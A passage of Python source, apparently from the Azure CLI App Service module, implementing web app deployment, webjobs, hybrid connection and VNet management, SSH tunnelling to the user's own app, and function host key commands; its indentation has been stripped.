except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation.".format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. Currently no way to poll for this
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. Currently no way to poll for this
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name,
name1=key_name,
value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
return result
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
